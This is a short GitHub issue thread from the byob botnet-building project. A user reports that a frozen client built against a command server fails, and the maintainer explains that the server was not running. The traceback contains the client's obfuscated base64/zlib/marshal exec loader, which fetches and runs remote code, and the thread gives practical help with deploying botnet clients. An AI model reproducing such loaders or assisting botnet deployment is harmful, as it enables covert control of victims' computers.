### ISSUE TITLE
DOCTYPE

### ISSUE THREAD

**Issue by b0dstone** [malwaredllc/byob#194]
i made i client with:
python client.py 192.168.0.30 1337 --freeze

im having issues in executing the .exe 
(issue Failed to execute script pyiboot01_bootstrap)

then i tried to exec in python(on the cmd)

python .\byob_oge.py
Traceback (most recent call last):
  File ".\byob_oge.py", line 5, in <module>
    exec(eval(marshal.loads(zlib.decompress(base64.b64decode('eJwrtmJgYCgtyskvSM3TUM8oKSmw0tc3tDTSMzSz0DPQMzawMjEy1NfXLy5JTE8tKtbPT0/VK6hU19QrSk1M0dAEAC+rEfU=')))))
  File "<string>", line 1
    <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
    ^
SyntaxError: invalid syntax

-python 2.7.14
-win10 1909

**Comment by malwaredllc** [comment]
That indicates the server is not running. Try manually going to the server ports 1338 and 1339 to see if you see a list of Python modules available.

**Comment by b0dstone** [comment]
*facepalm* thanks , it worked

trying to compile it to .exe using pyinstaller , gonna comment the sintax here : https://github.com/malwaredllc/byob/issues/168

(for organization purposes xd)

**Comment by malwaredllc** [comment]
Glad it worked!
